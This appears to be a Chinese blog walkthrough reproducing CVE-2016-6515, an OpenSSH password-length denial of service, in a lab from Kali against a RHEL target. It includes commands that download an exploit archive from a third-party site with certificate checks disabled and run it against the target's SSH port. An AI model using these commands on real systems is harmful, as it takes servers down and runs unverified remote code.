OpenSSH Auth_Password函数拒绝服务漏洞复现

OpenSSH是一款开源的安全远程登陆工具,也是Linux系统中最常用的服务之一,近年来频繁爆出高危漏洞,深受各大企业关注。一般情况下,OpenSSH经过安全加固后是几乎不可能在短时间内暴力密码攻破的,更多时候需要防范拒绝服务攻击。

实验环境

攻击系统:Kali 2019.4

目标系统:RHEL 6.10

目标地址:192.168.1.100

目标服务:OpenSSH 7.2p2

漏洞信息:CVE-2016-6515

影响范围:Openssh < 7.3

攻击原理:OpenSSH未限制密码验证中的密码长度,远程攻击者通过较长的字符串可造成拒绝服务。

模拟攻击

第一步 安装依赖包

  1. root@Kali:~# apt-get install  
  2. root@Kali:~# npm install ssh2  
  3. root@Kali:~# npm install commander  

第二步 下载、解压利用代码工具

  1. root@Kali:~# wget --no-check-certificate https://www.wanghualang.com/music/CVE-2016-6515.tar.gz  
  2. root@Kali:~# tar xzf CVE-2016-6515.tar.gz  

第三步 攻击目标系统OpenSSH

  1. root@Kali:~# ./CVE-2016-6515/exploit.js -h 192.168.1.100 -p 22 -u root  

被攻系统状况

短短数秒钟后,目标系统CPU可用率为0%,基本瘫痪!

OpenSSH Auth_Password函数拒绝服务漏洞复现

匿名

发表评论

匿名网友 填写信息